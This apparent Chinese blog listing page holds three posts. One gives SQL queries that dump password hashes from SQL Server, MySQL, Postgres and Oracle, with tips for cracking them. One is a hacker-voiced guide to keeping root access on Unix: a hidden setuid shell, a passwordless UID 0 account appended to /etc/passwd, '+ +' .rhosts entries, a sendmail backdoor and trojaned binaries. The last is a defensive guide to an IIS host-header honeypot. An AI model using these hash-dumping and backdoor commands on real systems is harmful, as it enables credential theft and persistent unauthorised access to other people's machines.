总是需要一些温暖。哪怕是一点点自以为是的纪念。 注册 | 登陆
浏览模式: 标准 | 列表2016年05月的文章

各种数据库密码hash获取语句

摘要:各种数据库密码hash获取语句,也可以直接使用sqlmap这个注入工具! SQL Server 2000:- SELECT password from master.dbo.sysxlogins where name='sa' 0010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 2FD54D6119FFF04129A1D72E7C3194F7284A7F3A 0010...

各种数据库密码hash获取语句,也可以直接使用sqlmap这个注入工具!


SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in 'cain and abel' and then work the case sentive hash
 


SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

 

MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

 

*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+——————–+
| PASSWORD('mypass') |
+——————–+
| 6f8c114b58f2ce9e |
+——————–+
 

*mysql >=4.1
mysql> SELECT PASSWORD('mypass');
+——————————————-+
| PASSWORD('mypass') |
+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+
Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'
 


Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
usename | passwd
——————+————————————-
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396



Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….

 

*nux如何创建后门

摘要:kindle's blog , 作者:kindle 千辛万苦(or 轻而易举)的取得root后,当然希望长久的保持. 以被以后用来。。。d0ing what u want t0 d0 :) 传统的方法就是建立一个后门(backd00r).即使入侵被发现,好 的(先进)后门仍然能够使你再次轻松的破门而入 请记住...

kindle's blog , 作者:kindle

千辛万苦(or 轻而易举)的取得root后,当然希望长久的保持. 以被以后用来。。。d0ing what u want t0 d0 :) 传统的方法就是建立一个后门(backd00r).即使入侵被发现,好 的(先进)后门仍然能够使你再次轻松的破门而入 — 请记住: ” we come back and we are the h.a.c.k.e.r ”

创建后门的方法如下:
-
1. setuid
#cp /bin/sh /tmp/.backdoor
#chmod u+s /tmp/.backdoor
加上 suid 位到shell 上,最为简单方便,但也最为容易被ADM 发现 find / -perm 4000 -print;同时在大多数的SUNOS 上 你会发现不能setuid。– 适用于新手;
-
 

2. echo “zer9::0:0::/:/bin/csh” >> /etc/passwd 即给系统增加一个 id 为 0(root)的帐号,无口令; 也很容易被发现。 — 适用于新手;
-
 

3.echo “+ zer9″>>/.rhosts
即本地的名为 zer9 的用户可以直接 rlogin target 无须口令此时的 zer9 就相当于口令,不知道的人是不能进去的.
前提是目标的port 512or513or514 opening.
注: 如 echo “+ +”>>/.rhosts 则任何用户都可rlogin至目标 导致目标门户打开,最好不要;
还可 echo “+ +”>>/etc/hosts.equiv 但这样不能取得root权限;– 适用于比新手高一点点,比中级水平低一点点的guys;
-
 

4.modify sendmail.cf 增加一个”wiz” 命令;
usage:
telnet target 25 [enter]
wiz[enter]
这是我从SAFEsuite中学到的(但没试过);比较危险。因为几乎所有的扫描器都会刺探本漏洞。不过你可把命令本身该成其他不易猜到的名字。比较复 杂,危险,但ADM不易发现,隐蔽性较强;你只在你的机器上试一试就okay了;– 顾名思意,大师级漏洞;
-
 

5. crack suck as inetd,login,…
即安装它们的特络绎版本。你需要找到各版本unix的rootkit;然后分别编译即可;– 如果目标机上没有安装 tripwire之类的东东,那几乎不可能被发现。linux&sunos&freebsd 的可能好找,但其他的了?即使你找到了,你有对应平台上的编译器吗?我有一台运行 slackware,one running irix,one runningsunos,one running hpux,one running digits unix,…
hahhahha,我又做梦了:)
– 我个人认为是最好的方法,但实现起来有一定风险,你必须考虑到如果你的木马运行出错怎么办–因为我们所做的一切都必须以不破坏目标机上的任何数据为原 则;
-

配置IIS蜜罐抵御黑客攻击

摘要:据有关资料显示,现在有大量的服务器仍在使用IIS提供Web服务,甚至有争夺占领Apache市场的趋势。在Web威胁日益严重的今天,我们当然要采用反病毒、防火墙、UTM、NAC等手段来加强网络安全。但是,有时正确地建设一个蜜罐也是对付黑客的必需任务。 什么是蜜罐?...

据有关资料显示,现在有大量的服务器仍在使用IIS提供Web服务,甚至有争夺占领Apache市场的趋势。在Web威胁日益严重的今天,我们当然要采用反病毒、防火墙、UTM、NAC等手段来加强网络安全。但是,有时正确地建设一个蜜罐也是对付黑客的必需任务。

 

  什么是蜜罐?简言之,蜜罐就是一个位于互联网上的计算机系统,其特定的目的是为了吸引并“诱捕”试图渗透进入其他人的计算机系统的黑客。要建立一个真正的蜜罐,用户需要做的事情很多,但至少要求用户做到三条,一是安装一个不打补丁的操作系统,并且需要使用默认配置,二是要保证系统上没有任何数据,三是添加一个设计目的是记载入侵者活动的应用程序。

 

  在IIS中配置蜜罐并不是一件件很复杂的事情,但它却可有助于极大地减少对IIS服务器的攻击。严格意义上讲,本文所谈论的并非一个真正的蜜罐,因为一个真正的蜜罐是一个拥有许多漏洞且故意暴露在互联网上的主机,这里所讨论的只不过是一个数据通信的转向器而已。使用HTTP主机的头信息,我们完全可以将攻击者的通信转向一个并不存在的站点上。

 

  黑客们会使用端口扫描器来查找那些开放着80号端口的IP地址,并对这些端口实施其攻击和侵入的企图。另外一方面,网站的终端用户会使用域名来访问站点,因此我们的措施并不会影响这些普通用户。通过启用网站上的主机头名并将IP企图重新转向,我们就可以跟踪和记录黑客来自何方,同时又保持了对终端用户的可用性。

 

  理论上的事儿先说到这里,下面我们开始建立一个蜜罐。

  我们需要做的第一件事情就是要在Web服务器上建立一个空的目录。其名称与位置没有什么关系,对于本例而言,笔者创建了一个称为Honeypot的目录,它位于C:\Inetpub\wwwroot的目录下。启动IIS 管理程序,并为所有的站点分配一个主机头名,这样每一台虚拟服务器都有一个带有IP地址的主机头名。如下图1:
 

  这里要保证虚拟服务器不能与无主机头名的80号端口上的IP地址有映射关系,并保证服务器不能拥有“全部未分配的” IP寻地址。并保障主机的头信息正确设置,用户仍可以访问所有的站点。如图2:
 

  然后,再创建一个新的网站指向刚才创建的目录。这个蜜罐网站应当指定所有未分配的IP地址,并且不能配置主机的头信息。虽然这个站点的名称叫“honeypot”,但这并不影响黑客对它的访问。进入这个新网站的属性设置界面,选择“目录安全”选项卡,并选中“集成windows身份验证”,取消选择其它的认证方法,然后单击“确定”。图3:

  接着,选择网站选项卡,并单击“高级”,单击“多网站配置”下的“添加”按钮,并添加所有的IP地址。如果你收到了一个关于IP地址冲突的错误消息,不要紧,这表明你没有为此网站设置主机头名。你需要做的是将IP地址从列表中清除,或为此网站配置一个主机头名。图4:
 

  保存所有的更改,然后退出Internet 信息服务。

  这样一来,当一个恶意用户通过IP地址来访问网站时,他就会被发送至空目录,并得到一个403错误。而通过DNS域名来访问网站的用户由于有了主机的头信息,就能够访问网站的内容。
 

  这样做并不是绝对的安全,因为黑客们仍会试图通过域名来访问网站,不过其多数攻击都被发送到了IP地址。使用主机的头信息会改善Web服务器的性能,这是因为WWW服务没有必要为使用独立IP地址的网站分配非页式内在池。
 

  还有一点,一些较低版本的浏览器(不符合HTTP1.1规范的浏览器)将被直接转向空目录,因为这种浏览器不接受主机头名。不过,现在这种浏览器几乎没有人用了吧?